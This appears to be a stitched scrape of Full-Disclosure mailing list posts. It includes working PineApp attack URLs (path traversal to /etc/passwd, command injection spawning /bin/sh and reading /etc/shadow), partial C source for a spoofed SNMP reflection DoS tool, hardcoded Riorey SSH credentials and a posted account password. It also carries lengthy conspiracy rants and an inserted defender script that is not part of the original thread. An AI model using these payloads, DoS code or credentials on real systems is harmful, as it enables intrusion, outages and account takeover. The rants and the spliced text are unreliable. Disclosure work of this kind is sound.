[Full-disclosure] pineapp mailsecure pwnage

2013-11-19 Thread full-disclosure-bounces
https://192.168.0.1:7443/admin/viewmsg.php?msg=/etc/passwd

pa_cli system ping ;/bin/sh
pa_cli system ping ;chsh -s /bin/csh pineapp

https://192.168.0.1:7443/admin/management.html?it=sys_usermng

https://192.168.0.1:7443/admin/confnetworking.html?cmd=pingtype=upframepinghost=%27;cat%20/etc/shadow;%27pingtimes=3

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] SNMP Reflected Denial Of Service - PoC

2012-09-03 Thread Full Disclosure
Actually, if you test it against Windows snmpd or a lot of cable modems out 
there, the getbulk request causes a 1500 byte packet reply.
You probably tested it against Linux snmpd or Cisco, which in that case, yes, 
it returns null.

31.08.2012, 09:31, Anestis Bechtsoudis bechtsoudi...@gmail.com:
 On 8/30/12 8:13 PM, Full Disclosure wrote:

  Hi list,

  I am releasing this code due to the fact that my dev server got hacked and 
 people have been using it in the wild for bad things.

  Network admins should patch their networks appropriately by rejecting snmp 
 connections from unwanted IPs.

 The quoted code is actually nothing more than a regular threaded UDP
 flood DoS tool, both SNMP spoofed requests and responses are equally 65
 bytes (no reflection). Make a simple network capture for verification.

 The payload is a mis-used .1.3.6.1 getBulk SNMP request resulting in a
 null value response.

 A sample perl script with the biggest reflection factor per transaction
 achieved on Cisco devices is available here [1] (Amplification = 84
 bytes request / 1480 bytes response).

 For more information about SNMP reflection DoS you may refer to this
 link [2].

 The quoted code reminds me of an old implementation on the same concept [3].

 [1] http://pastebin.com/M9cJs89h
 [2] https://bechtsoudis.com/hacking/snmp-reflected-denial-of-service/
 [3] http://packetstormsecurity.org/DoS/snmpdos.c

 -A

 --
 #--#
 | Anestis Bechtsoudis  |
 |  |
 | Network Operation Center,    |
 | Laboratory for Computing (LabCom),   |
 | Dept. of Computer Engineering & Informatics, |
 | University of Patras, Greece |
 |--|
 | Public Key: http://bit.ly/Q2f5gW |
 | Website: https://bechtsoudis.com |
 #--#
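
Added example (not part of the original thread or of any poster's code): a defender-side check that computes the request/response byte ratio discussed above from flow records and flags SNMP agents that answer hosts outside an allowlist of managers. The flow tuple layout, the sample records, the allowlist and the 2.0 threshold are assumptions constructed for illustration.

```python
import ipaddress
from collections import defaultdict

SNMP_PORT = 161

# Constructed sample flows: (src_ip, src_port, dst_ip, dst_port, payload_bytes).
# Addresses are documentation ranges; the sizes reuse the figures quoted in the
# thread (84-byte request / 1480-byte reply, and 65 bytes in each direction).
SAMPLE_FLOWS = [
    ("192.0.2.10", 40000, "198.51.100.5", 161, 84),     # legitimate manager poll
    ("198.51.100.5", 161, "192.0.2.10", 40000, 1480),
    ("203.0.113.77", 1025, "198.51.100.5", 161, 84),    # source is not a manager
    ("198.51.100.5", 161, "203.0.113.77", 1025, 1480),
    ("203.0.113.77", 1026, "198.51.100.5", 161, 84),
    ("198.51.100.5", 161, "203.0.113.77", 1026, 1480),
    ("203.0.113.77", 1027, "198.51.100.6", 161, 65),    # agent answers, same size
    ("198.51.100.6", 161, "203.0.113.77", 1027, 65),
    ("203.0.113.77", 1028, "198.51.100.7", 161, 84),    # agent stays silent
    ("198.51.100.9", 161, "203.0.113.80", 5555, 1480),  # reply, no request seen
]

ALLOWED_MANAGERS = ["192.0.2.0/28"]  # assumed management subnet


def find_snmp_reflection(flows, allowed_managers, min_factor=2.0):
    """Return (agent, peer, kind, factor) for each SNMP agent that sent replies
    to a peer outside allowed_managers.

    kind is "reflector" when reply bytes / request bytes >= min_factor,
    "unauthorized" when the agent answers without amplifying (still a filtering
    gap), and "unsolicited" when replies were seen with no matching request,
    which is what a sensor on the receiving side of a reflection observes.
    """
    allowed = [ipaddress.ip_network(net) for net in allowed_managers]
    # (agent, peer) -> [request bytes, reply bytes]
    totals = defaultdict(lambda: [0, 0])
    for src, sport, dst, dport, nbytes in flows:
        if dport == SNMP_PORT:        # request towards an agent
            totals[(dst, src)][0] += nbytes
        elif sport == SNMP_PORT:      # reply from an agent
            totals[(src, dst)][1] += nbytes

    findings = []
    for (agent, peer), (req, resp) in sorted(totals.items()):
        if any(ipaddress.ip_address(peer) in net for net in allowed):
            continue                  # expected management traffic
        if resp == 0:
            continue                  # agent did not answer: filtering works
        if req == 0:
            findings.append((agent, peer, "unsolicited", None))
            continue
        factor = round(resp / req, 2)
        kind = "reflector" if factor >= min_factor else "unauthorized"
        findings.append((agent, peer, kind, factor))
    return findings


if __name__ == "__main__":
    for agent, peer, kind, factor in find_snmp_reflection(SAMPLE_FLOWS,
                                                          ALLOWED_MANAGERS):
        print(f"{agent} -> {peer}: {kind} (factor={factor})")
```

An agent reported as "reflector" or "unauthorized" is one where the advice from the original post applies: restrict which source addresses may reach UDP/161.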


[Full-disclosure] SNMP Reflected Denial Of Service - PoC

2012-08-31 Thread Full Disclosure
 ) {
            args.dstip = current->ip;
            send_udp( args.socket, args.srcip, rand(), args.dstip,
                      SNMPPORT, payload, sizeof(payload)-1 );
            current = current->next;

#ifdef DEBUG
            count++;
            printf("Packets sent: %lu\n", count);
#endif
        }
    }
}

void push_ip(struct snmp_s** snmp_s_ref, unsigned int ip) {
    struct snmp_s* temp = malloc(sizeof(struct snmp_s));

    temp->ip = ip;
    temp->next = *snmp_s_ref;
    *snmp_s_ref = temp;
}

void add_snmp_s(void) {
    char* aline = calloc(16, sizeof(char) );

    FILE* fp = fopen(args.filename, "r" );

    if( fp == NULL) {
        perror("Fatal error: ");
    }

    while ( !feof(fp) )
    {
        fscanf( fp, "%s\n", aline );
        push_ip(&first_s, inet_addr(aline));
        memset( aline, 0, 16 );
    }
    fclose(fp);

#ifdef DEBUG
    int l = snmp_s_length(first_s);
    printf("Built linked list from file.\n");
    printf("Nodes: %d\n", l);
#endif
}

int snmp_s_length(struct snmp_s* list) {
    struct snmp_s *current = list;
    int count = 0;

    while( current != NULL ) {
        count++;
        current = current->next;
    }
    return count;
}

int main(int argc, char *argv[]) {
    char *data;
    int t=0;
    int j=0;

    // threads
    pthread_t thread_id[MAXTHREADS];

    data=malloc(sizeof(payload)+sizeof(payload)-1);
    memcpy(data, payload, sizeof(payload)-1);

    if(argc < 3) {
        printf("Usage: %s <target ip> <reflectors list>\n", argv[0]);
        exit(1);
    }

    if((args.socket=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0)  /*open sending socket*/
    {
        perror("socket");
        exit(1);
    }

    /*Prepare IP header (static data)*/
    ip_head.ihl      = 5; /*headerlength with no options*/
    ip_head.version  = 4;
    ip_head.tos      = 22;
    ip_head.frag_off = 0;
    ip_head.ttl      = 255;
    ip_head.protocol = IPPROTO_UDP;
    ip_head.check    = 0; /*Must be zero for checksum calculation*/

    /* Prepare UDP header*/
    udp_head.len   = htons(sizeof(struct udphdr)+sizeof(payload)-1);

    args.srcip = inet_addr(argv[1]);
    args.filename = argv[2];

    // Read file and save the IPs in a linked list.
    add_snmp_s();

    // Create threads
    for(t=0; t<MAXTHREADS; t++) {
        pthread_create(&thread_id[t], NULL, drdos, NULL);
    }

    for(j=0; j<MAXTHREADS; j++) {
        pthread_join(thread_id[j], NULL);
    }

    return 0;
}



[Full-disclosure] Intercepting TOR

2012-08-16 Thread full-disclosure


All,

Read an interesting article on intercepting TOR users via proxies and
using the BeEF framework today.

http://packetstormsecurity.org/files/115516/jackin-tor.txt

Any ideas on how this could be mitigated?



Re: [Full-disclosure] can you answer this?

2012-02-03 Thread Full Disclosure mailing list
On 03/02/2012 08:20, RandallM wrote:
 since no one could answer the last one how bout this. In my FW log
 Trust (our 10.0.0.0. network) to untrust picked this up:

 2012-02-02 10:08:10 7.254.254.254:68 7.254.254.255:67 0.0.0.0:0
 0.0.0.0:0 DHCP 0 sec. 0 0 Traffic Denied

 My any to any denied queue.

   

I've seen this sort of thing before, from misconfigured VPNs.

Do you have someone using Tunngle on your network?

It's a VPN product (as far as I understand it, primarily for gaming), 
and it appears to (mis)use the 7.xxx.xxx.xxx IP address space.  See this 
for a report of similar packet sightings:

http://www.tunngle.net/community/topic/18311-bsod/

My guess is that one of your users has set up this VPN in order to 
tunnel through your firewall, but it's not configured correctly and its 
DHCP requests are going onto your main network rather than (as intended) 
through the tunnel.  You might want to look into who is using this...

Granville Moore
Nemesys Computer Consultants
www.nemesys.com



[Full-disclosure] i dont know security

2010-09-07 Thread full-disclosure-bounces
Hello Full-Disclosure!

I want to warn you that I don't know anything about running secure sites. As a 
result it seems I have been compromised!

www.websecurity.com.ua



[Full-disclosure] Multiple D-Link Routers Vulnerable to Authentication Bypass

2010-01-09 Thread Full Disclosure
Multiple D-Link routers suffer from insecure implementations of the Home
Network Administration Protocol which allow unauthenticated and/or
unprivileged users to view and configure administrative settings on the
router.

Further, the mere existence of HNAP allows attackers to completely bypass
the CAPTCHA login features that D-Link has made available in recent
firmware releases.

These vulnerabilities can be exploited by an individual inside the local
network, as well as an external attacker.

It is suspected that most, if not all, D-Link routers manufactured since
2006 have HNAP support and are vulnerable. However, only the following
routers and firmware versions have been confirmed to date:

 1) DI-524 hardware version C1, firmware version 3.23
 2) DIR-628 hardware version B2, firmware versions 1.20NA and 1.22NA
 3) DIR-655 hardware version A1, firmware version 1.30EA

Full description and POC code available here:
http://www.sourcesec.com/2010/01/09/d-link-routers-one-hack-to-own-them-all/

[Full-disclosure] The Cyber War Conspiracy

2009-11-30 Thread full-disclosure
 is connected to 
John Cartwright and there is a conspiracy to gag me because I was touching home 
too many truths about the build up towards cyber war and the people behind the 
plot for a cyber 9/11.

It's not kids in their bedrooms with the anti-n3td3v aliases, its these guys in 
the suits conspiring to carry out a cyber 9/11.

The aliases against me, they aren't kids. They are grown men security 
professionals, the same men who don't like being called out and can't even use 
their real names in their campaign against me. I openly post with my real name 
to criticize and still would be using my real name, except it got banned by 
John Cartwright, the guy who hides behind grok.org.uk and nobody knows anything 
about, hiding in the shadows while banning anyone from this list who remotely 
gets close to the political truth.

If you look back to January 2009 when n3td3v got banned it was exactly at the 
point where I wasn't believing in cyber war. I am the only person to be banned 
from this mailing list, you've got to ask yourself why. All I done was full 
disclosure which is what this list is about, but the people in power don't 
like it when its full disclosure of them not other people.

Like the Mossad and Funsec, they don't like that mentioned on full disclosure. 
It's full disclosure of information, but because it involves something not 
liked because it exposes them, then its not accepted.

You need to look into the real reasons n3td3v got banned and its nothing to do 
with what you think is the reason of someone with no value to the mailing list. 
Who dare say which disclosures are value and who's aren't.

So already you're seeing evidence this mailing list is corrupt and the person 
running it panicking because his friends over at SANS and other places are 
being exposed for their crave for cyber war and a cyber 9/11 event to take 
place.

Valdis isn't a random person either, he's proved he's pro-cyber war with a vested 
interest against me saying any of this stuff.

Look at the people against me, then investigate their role in the ring of power 
that's developing in the cyber security vacuum.

This is probably the last you'll see of the real n3td3v because there is sure 
to be a contract killer out to silence me.

There have already been discreet warnings, like in the mp3 that was posted by 
vomithatsteve () yahoo com, it said mi6 were going to kill me, they actually 
meant U.S Intelligence, but put MI6 in its place just to screw with British 
Intelligence even more.

And the warning by - o z - osgo () hotmail com and reposted by sahalderf at 
ymail.com that said Solutions:  There's a few, but I wouldn't want to be 
responsible for the end result

If I was just some kid troll, would any of this have gone on for so long? How 
many years is it now? There will be no let down, there has been no trolling 
apart from the times the sponsored aliases have frustrated me into a flame to 
distract me from posting what I wanted to post that was hitting the political 
truth too much.

There is more going on than you can see, this is a war at the moment of words 
because there are vested interest groups out there wanting cyber war to advance 
the security industry, while there are people like me who are monitoring these 
guys and seeing their intentions and they don't like anyone who is exposing 
them and me wanting to stop them from carrying out cyber-war/terrorism to 
advance the security industry.

Expect more people impersonating me, signing as my real life name etc... mock 
psycho analysis emails being post by people who are too cowardly to use their 
real name, they aren't kids, they are the political elite trying to make sure 
anything I say is trashed.

I am saving the world from the people who claim to be saving the world, but how 
can they be saving the world if they are planning a cyber event to push forward 
the advancement of the cyber security industry?

Cue all the sponsored aliases who are out to get me, by the time you read this 
email address will already be banned.

Just listen to the State of the Internet 2009 panel podcast by SANS, they got 
an audience to laugh out loud when they kept mentioning my n3td3v name, the 
recording is available on the internet as a podcast, this isn't just people 
annoyed about some kid on full-disclosure mailing list, this is part of a 
sophisticated campaign against me which started in 2006.

This is unprecedented the amount of effort gone into trashing some apparent kid 
called n3td3v, if I was just some kid they wouldn't be going to the lengths 
they have to trash me.

This mailing list is part of corruption, the corruption that is covering up 
n3td3v and sweeping him under the carpet and throwing him away.

My last words to you is, don't let this matter rest, they have got rid of 
n3td3v, but there are bound to be people who will investigate what im saying, 
and I hope they do. Because my last request before I finish this rant is, don't 
forget the things ive been talking

Re: [Full-disclosure] funsec as a terror cell

2009-11-29 Thread full-disclosure
What has Al-Qaeda got to do with The Mossad planting fake car bombs in Tel Aviv?

According to Reuters it was nothing to do with Al-Qaeda and was a test-run to 
target Arab guerrilla leaders.

The Mossad chose Tel Aviv port for a “model run” — Israeli spooks’ term for a 
rehearsed operation in a safe area that closely resembles the real target’s 
environment.

So: What foreign ports look most like Tel Aviv’s, and which Arab guerrilla 
leaders frequent them?

http://blogs.reuters.com/axismundi/2009/11/25/frayed-cloak-rusty-dagger/

 Original Message 
From: RandallM randa...@fidmail.com
Apparently from: full-disclosure-boun...@lists.grok.org.uk
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] funsec as a terror cell
Date: Sat, 28 Nov 2009 09:50:12 -0600

 /me wonders how close a relationship I have with al Qaeda.


[Full-disclosure] Impersonation attempt of MI7

2009-11-29 Thread full-disclosure
Under U.K and U.S law it's illegal to impersonate an intelligence agency (MI7) 
and / or intelligence officer.

Looks like jdl at mac.hush.com has got himself into a bit of a mess while 
trying to mock-n3td3v.

I don't think the authorities care about you mocking n3td3v but when you 
signed your mock emails with his actual real life name and put MI7 along with 
it you have entered into a grey area.

Formally you could be charged under U.K law with your emails, I doubt anyone is 
going to pursue the matter though but its worth noting you have actually broken 
the law.

It's likely you didn't realise MI7 was an actual intelligence agency but thats 
the risk you took in your mock-n3td3v emails.



Re: [Full-disclosure] Symantec Online Store Hacked

2009-11-29 Thread full-disclosure
Why don't you go off to The Mossad's Funsec and post this stuff? 
It was only a fake car bomb...

 Original Message 
From: Ivan . ivan...@gmail.com
Apparently from: full-disclosure-boun...@lists.grok.org.uk
To: full-disclosure full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Symantec Online Store Hacked
Date: Mon, 30 Nov 2009 09:13:32 +1100

 http://news.softpedia.com/news/Symantec-Online-Store-Hacked-127726.shtml



Re: [Full-disclosure] funsec as a terror cell

2009-11-28 Thread full-disclosure
 How does that have any relationship to funsec?

I don't trust anyone connected to Gadi Evron, Mossad, IDF, especially if they 
are going around planting car bombs, then what do you expect they have planned 
in the cyber domain to obtain more power over the people? I certainly wouldn't 
subscribe to Funsec. Sure harvest the data post to build up evidence against 
them but apart from that I wouldn't want to be part of it. 

While Funsec doesn't appear sinister its still a branch of the bigger picture 
of Gadi Evron, Mossad, IDF and their Clandestine operations. Most of the folks 
on Funsec are just there to groom Gadi Evron because of his connections with 
Israeli Intelligence, they aren't genuinely supportive of Gadi Evron. However, 
there do seem to be a few fruitcakes on there such as yourself who are 
genuinely supportive of Gadi Evron, Mossad, IDF and don't seem to be able to 
scope the bigger picture of whats going on. 

It is them I feel sorry for, the ones who don't realise, the naive ones of the 
Funsec mailing list who probably don't realise the bigger picture. 

Proof people aren't genuinely supportive of Gadi Evron and we are all working 
against him/them on the mailing list:

Forwarded conversation
Subject: fyi


From: n3td3v xploita...@gmail.com
Date: Thu, Oct 16, 2008 at 6:19 PM
To: la...@larryseltzer.com


funsec is a branch of the mossad

--
From: Larry Seltzer la...@larryseltzer.com
Date: Thu, Oct 16, 2008 at 6:27 PM
To: n3td3v xploita...@gmail.com


Why do you think I posted the story there?

--
From: n3td3v xploita...@gmail.com
Date: Thu, Oct 16, 2008 at 6:33 PM
To: Larry Seltzer la...@larryseltzer.com


lol



Re: [Full-disclosure] funsec as a terror cell

2009-11-28 Thread full-disclosure
 we've been outed by an MI7 mole.

i honestly don't think you actually believe jdl at mac.hush.com was anything 
but an impersonation attempt.



Re: [Full-disclosure] Impersonation is a against the law.

2009-11-27 Thread full-disclosure
it was funny you pretending to be n3td3v LOL...

 Original Message 
From: kaibelf j...@mac.hush.com
Apparently from: full-disclosure-boun...@lists.grok.org.uk
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Impersonation is a against the law.
Date: Thu, 19 Nov 2009 00:20:54 +

 if u r from the British Government I am looking for jobs in national 
 security



[Full-disclosure] GCHQ supplier pans government file-sharing plans

2009-11-27 Thread full-disclosure
One of the companies that supply intelligence technology to the government has 
criticised UK plans to monitor file-sharers.

Detica told ZDNet UK on Thursday that government plans to force ISPs to 
identify unlawful file-sharers were not proportionate.

"If the government chose to go down that route, we would come out strongly 
against," said Detica media accounts director Dan Klein. "It's not necessary or 
proportionate."

Detica, a BAE subsidiary, provides technologies that are used by the 
intelligence services and law enforcement to gather intelligence. While 
targeted monitoring of potential terrorists was proportionate, said Klein, 
using similar technologies for civil infringements was unnecessary.

http://news.zdnet.co.uk/security/0,100189,39906065,00.htm



[Full-disclosure] funsec as a terror cell

2009-11-27 Thread full-disclosure
What do you folks think about funsec developing into a terror cell of 
security professionals?



Re: [Full-disclosure] funsec as a terror cell

2009-11-27 Thread full-disclosure
A trainee spy for Israel's secret service agency Mossad was arrested by Tel 
Aviv police while taking part in a training operation, media reports say.

The young trainee was spotted by a female passer-by as he planted a fake bomb 
under a vehicle in the city.

http://news.bbc.co.uk/1/hi/world/middle_east/8377746.stm

[/cut]

Are these the people Valdis.Kletnieks wants to be associated with? 

 Original Message 
From: valdis.kletni...@vt.edu
To: full-disclos...@safe-mail.net
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] funsec as a terror cell
Date: Fri, 27 Nov 2009 16:01:29 -0500



[Full-disclosure] Riorey RIOS Hardcoded Password Vulnerability

2009-10-07 Thread full-disclosure-bounces
Title: Riorey RIOS Hardcoded Password Vulnerability

Severity: High (Full root access to the device)
Date: 07 October 2009 
Versions Affected: RIOS 4.6.6 , 4.7.0 possibly others
Discovered on: 25 July 2009
Vendor URL: www.riorey.com
Author: Marek Kroemeke

Overview:

Riorey DDoS mitigation appliances (www.riorey.com) are vulnerable to taking a 
full control over affected devices via a hardcoded username and password used
to create a SSH tunnel between the RView application and the device itself.


Details:

Riorey devices running affected RIOS versions have a hardcoded username and 
password that is then used by the RView software to connect on port 8022 in
order to create a SSH tunnel. This allows the attacker to login as user
'dbuser' using the hardcoded password, and due to an old Linux kernel version
used - escalate privileges through several vulnerabilities and eventually take
the full control over the device.

Additionally - the web interface advises the user to reset the admin password 
for security reasons, but the RView application still uses the hardcoded
password in order to create the SSH tunnel which may result in a false sense
of security.

Proof of Concept:

Open your favorite SSH client and use the following details in order to login:

port: 8022
username: dbadmin
password: sq!us3r

-- cut --
r...@rioreyxxx dbuser # id
uid=0(root) gid=0(root) groups=0(root)
r...@rioreyxxx dbuser # uname -a
Linux rioreyXXX 2.6.16.6 #23 SMP Fri Oct 24 19:29:08 EDT 2008 x86_64
Dual-Core AMD Opteron(tm) Processor 1210 HE AuthenticAMD GNU/Linux
-- cut --


Mitigation:

Login to the device via SSH using the above details, and reset the password 
using the 'passwd' command.


Vendor Contact:
30 July 2009 - Initial vendor contact
31 July 2009 - Vendor replies advising to use a firewall in front of the device
01 August 2009 - Vendor replies that next software release will address this 
problem, work in progress
09 August 2009 - Vendor sends an email confirming that it's not ready yet but 
will be by the end of the month
16 August 2009 - Confirmation about release day of a patched version - 05 
October 2009
07 October 2009 - Releasing the vulnerability report. 



[Full-disclosure] Full Disclosure Gmail account

2009-03-02 Thread Full Disclosure

 bob jones has invited you to open a free Gmail account.


Thanks bob!

account name: full.disclosure.pub...@gmail.com
password: structuredexceptionhandler

Re: [Full-disclosure] e-Holocaust

2009-01-13 Thread Some Guy Posting To Full Disclosure
Okay e.hitler you mention you're attacking Israeli servers*, lets
ignore the impact of that for a second. e.Hitler I want you to tell
me, in more than a sentence, why you did that. Yeh, you failed to
mention it in your original post. Tell me exactly how your cause makes
you feel, and why.

Now tell me how what you're doing makes a difference, that is: 'In
what way does what you did help solve the problem that was bothering
you?' (read it!: HOW does it make a difference, don't just tell me
THAT it makes a difference, I want you to describe out a sequence of
events.

One more question. Do you think you're a good hacker (in terms of
skill). I'm not saying you're good or bad, I've no idea. Further more
I couldn't tell you what makes a good hacker, I don't know enough
(any) of them. Do you think that this event here proves that, or at
least aids proving it?

*Btw defacements happen all the time - wanna do some research on
pathetic skiddies? search the 'google dorks' included in web app
exploits when they're published on milw0rm. They're actually competing
for the servers (re-owning them, etc). Those 21 sites are a drop in
the ocean compared to how many (even anti-Israeli, and the other side)
defacements have happened.
As for the paypal accounts and (so called) 'ownage' of individuals and
their personal data, really this is another drop in the ocean for
Israel (what its economy). Compare the well-being of these individuals
with the number of people being killed in a WAR! Hell! Compare it to
the holocaust, now argue with a WWII vet or holocaust survivor (are
there any still living?) that you are e.Hitler, righteous internet
warrior. Not only that, most CC companies give you the money you lost
scams or stolen paypals. You can even cancel it before transactions
are paid. Then there's insurance companies.

Cheers.



Re: [Full-disclosure] CCIE makes u go nuts?? or is that only nuts get CCIE????

2009-01-04 Thread Some Guy Posting To Full Disclosure
I don't get why this is news. Murder happens all the time.

Has he even been found guilty yet? True it looks like it is, but just
look at that news article! You can perve on some poor guys destruction
because it makes great news. I remember this happened a few years back
to someone else and the guy was found innocent, despite the way the
news channels made it look.

On 1/3/09, Joel Jose joeljose...@gmail.com wrote:
 http://www.networkworld.com/community/node/35713

 It scares the hell out of me. when i read the topics...and try to
 learn i cant help my mind and heart doubting...when will my name
 come in a news like that.. maaa... 8 years in cisco... a voice
 architect. hm... i was wanting to become like that without
 the twists that is... ;(... its scary


 lemme see ur responses


 Joel.
 --
 it's not the years in your life that count. It's the life in your
 years. Abraham Lincoln




-- 
I'm your best best friend.



Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now

2008-12-22 Thread Some Guy Posting To Full Disclosure
Oh my, you both seem to have emailed your conversation to the full
disclosure mailing list by accident.

How embarrassing. Every body who is subscribed has received emails of
you two talking about something that ONLY CONCERNS YOU TWO.

Maybe next time when you send emails to each other you should double
check that you're not sending them to a mailing list about
vulnerability disclosure.

On 12/22/08, n3td3v xploita...@gmail.com wrote:
 On Mon, Dec 22, 2008 at 1:26 PM, Ureleet urel...@gmail.com wrote:
 u say u r a badass hacker

 When?




-- 
I'm your best best friend.



Re: [Full-disclosure] Microsoft issues out-of-band patch

2008-12-19 Thread Some Guy Posting To Full Disclosure
Here's an article explaining why Microsoft delays their patching:
http://en.wikipedia.org/wiki/Patch_Tuesday

Specifically this bit:
In order to reduce the costs related to the deployment of patches,
Microsoft introduced the concept of Patch Tuesday. The idea is that
security patches are accumulated over a period of one month, and then
dispatched all at once on an anticipated date which system
administrators can prepare for.

On 12/19/08, Bipin Gautam bipin.gau...@gmail.com wrote:
 stop putting so much of attention to 0-day and possible use of it by
 government to get into a terrorist pc.

 if breaking into someones pc was a matter of national security
 importance 0-day may provide a easy leverage but you really dont need
 a 0-day to get into someones pc, neither you'd need a already
 existing/known backdoor, neither you'd need to bruteforce into the
 advisory or a physical access to it.

 all they need to do is poison a unsigned executable/plugin/update with
 a backdoor instead, that is being downloaded to the advisory computer
 over an unencrypted connection if you can control the network gateway
 or have isp level access. such attacks could work regardless of the
 OS or patch level.




-- 
I'm your best best friend.



Re: [Full-disclosure] 21 Million German bank accounts stolen

2008-12-09 Thread Some Guy Posting To Full Disclosure
To you or someone who knows anything about banks, fraud, and how they
work and things.

I have a German bank account.

Should I do something!?

On 12/9/08, James Matthews [EMAIL PROTECTED] wrote:
 German banks are some of the oldest in the world. This is pretty scary
 however it is also the reality of germanys new laws... I hope they find it
 soon and protect the people that need to be protected
 http://it.slashdot.org/it/08/12/09/0125201.shtml

 --
 http://www.astorandblack.com/



-- 
I'm your best best friend.



Re: [Full-disclosure] We're letting the bad guys win

2008-12-09 Thread Some Guy Posting To Full Disclosure
ok this is what this whole thing looks like to me:

To n3td3v:
You often post ideas and express your opinion to this list. The  some
(often the more liberal) of us often disagree with you and others mock
you for your adventurousness. Actually sometimes it looks childish,
almost as if you're desperately trying to propose the big new thing
that changes the world.
The thing is you're posting to a list where really, all that happens is
people (mostly sec companies) post information on vulnerabilities in
software and news in the sec field.
You say you came here for information, then LEECH like the rest of us
- just shut up. If you want a mailing list for proposed security
project ideas then make one.
You're enthusiastic and a dreamer who's obviously very forward and
ambitious with that excellence. Just think before you talk, and maybe
do something, like sit down and think:
I want to be $A(as in what you're going to do with your LIFE!). To be
that I need to get $B done. To do that I have to do $C[]/*-that's a
list(:s)*/.

To all that oppose n3td3v:
Some of you (UreLeet + others) get a little too excited and flame. If
you don't like how someone acts, what they have to say, who they are:
then shut up! You don't need to bully something into submission just
because you don't like it. If you get some angry rush feeling when you
see a some stupid fat kid majorly embarrass himself by attempting to
be funny with his freinds and just looking like that annoying retard
kid the don't bully him! Be gentle and point out the problem
(privately) (of course first think are you really of a knowledge and
responsibility to instruct this child how to change his life) OR, much
better: shut up, and go take your (own) anger out somewhere else, PC
games do it for me, www.thepcmanwebsite.com/media/pacman_flash/ -
even that's good enough.
btw  n3td3v - I don't think you're a retarded fat child (ur not right?).

Come to think about it: We're being listened to by a bunch of other
people, mostly geeks who think FD is the shitz where all the l33t sec
companies go for their patches and sec news (it isn't!). But are we
all just doing this crap for the benefit of our audience. I mean I
could have written these things to the individuals they were intended
for. Hell I could have taken my own advice and shut up, blocked the
troublesome email addresses, and carried on with my life (I'm a
hobbyist). Are You All Just Doing This For The Benefit Of The Sec Gods
We Wish We Were?  THINK ABOUT IT

Oh also I don't care about me - I'm a leech, I should probably not
post on this list unless I have something decent to say too.

On 12/9/08, Ureleet [EMAIL PROTECTED] wrote:
 thats all he does is deflect, weve established that he never gives a
 real answer.

 On Tue, Dec 9, 2008 at 12:25 PM, Elazar Broad [EMAIL PROTECTED] wrote:

 Brilliant use of deflection, keep it up, you might end up as some
 loser serial rapist on Law and Order, oh wait, they want actor's,
 not the real thing...

 On Tue, 09 Dec 2008 11:55:08 -0500 n3td3v [EMAIL PROTECTED]
 wrote:
On Tue, Dec 9, 2008 at 3:08 PM, Paul Schmehl
[EMAIL PROTECTED] wrote:
 --On Tuesday, December 09, 2008 00:25:18 -0600
[EMAIL PROTECTED] wrote:


 On Tue, 09 Dec 2008 04:03:57 GMT, n3td3v said:
 We need to stop this back and forth fighting its making
infosec look
 bad, this isn't what infosec should be about.

 It's making one very small insignificant corner of infosec look
bad.

 Let's keep a sense of perspective, guys.

 Or, to look at it another way, it's tying up all the idiots in
one place and
 keeping the rest of infosec unsullied.  :-)


I agree,
But full-disclosure shouldn't be full of idiots so why do we let
it be
that way. It's because we reply to them that it happens. I was
gullible and naive to reply to them, i'm not replying to them
anymore.


Re: [Full-disclosure] FD culture!?

2008-12-06 Thread Some Guy Posting To Full Disclosure
'British intelligence service'!?

According to this:
http://lists.grok.org.uk/full-disclosure-charter.html
...Full Disclosure is run by secunia. And administered by one man.

Does the 'British Intelligence Service' doesn't even exist?
There's:
The Security Service AKA MI5.
and SIS AKA the Secret Intelligence Service.

Also any one who thinks FD is/should be something read the info in the
link above.

On 12/6/08, n3td3v [EMAIL PROTECTED] wrote:
 What part of there are no moderators don't you get.

 This list is run by the British intelligence service and you are a guest
 here.

 On Sat, Dec 6, 2008 at 6:00 AM, Bipin Gautam [EMAIL PROTECTED] wrote:
 Shame on FD moderators




-- 
I'm your best best friend.



Re: [Full-disclosure] Project Chroma: A color code for the state of cyber security

2008-11-30 Thread Some Guy Posting To Full Disclosure
I'd just like to point out that Symantec has something similar.
See here: http://www.symantec.com/security_response/threatconlearn.jsp

It's not applied in such a useful way as you suggest - but in case you
wanted to know.

On 11/29/08, Mike C [EMAIL PROTECTED] wrote:
 Hi,

 It is time to take an example from Homeland Security and define codes
 of color for cyber-warfare threat levels. I propose the following:

 Green level: There is negligible threat to online security.
 Yellow level : There is a minimal level of threat, and this must be
 monitored and contained.
 Orange level: This level of threat indicates there are parties who are
 actively engaging in cyber-warfare. Caution is required when online.
 Red level: This level indicates a full blown cyber-war. It indicates
 very high probability of all communications being intercepted.

 While homeland security's implementation does not seem to have a real
 world merit, such a threat level would certainly be very useful in the
 online security realm. Please disseminate this announcement of the
 project Chroma levels for online security. The immediate mission of
 the project is to be picked up by the antivirus and security tools
 vendors, so as to add the color codes to their products and provide
 users with a tangible measure of their online security.

 Current status: Threat level Yellow.

 --
 MC
 Security Researcher
 Lead, Project Chroma.




-- 
I'm your best best friend.

Usually I like it when you contradict me, it might help me learn. Just
don't be so angry.



Re: [Full-disclosure] Indian allegations alarm Pakistan

2008-11-30 Thread Some Guy Posting To Full Disclosure
Aren't they just a bunch of kids trying to brag on IRC that they
hacked their 'enemy' country? Maybe they don't like them because
propaganda is telling them Indians did the bombing. Or maybe,
like most kids, they've no idea about current affairs and just want to
prove themselves good in their own little world.

Like what happened with Russia vs. Georgia.

On 11/30/08, James Matthews [EMAIL PROTECTED] wrote:
 India was attacked the attackers came from Pakistan, I understand why
 Pakistan feels threatened however why would they attack Indian sites?

 On Sun, Nov 30, 2008 at 9:19 AM, Mike C [EMAIL PROTECTED] wrote:

 On Sun, Nov 30, 2008 at 11:11 AM, n3td3v [EMAIL PROTECTED] wrote:
  On Sun, Nov 30, 2008 at 5:25 AM, Mike C [EMAIL PROTECTED] wrote:
 
 
  On Sun, Nov 30, 2008 at 7:39 AM, Raj Mathur [EMAIL PROTECTED]
 wrote:
 
  On Sunday 30 Nov 2008, n3td3v wrote:
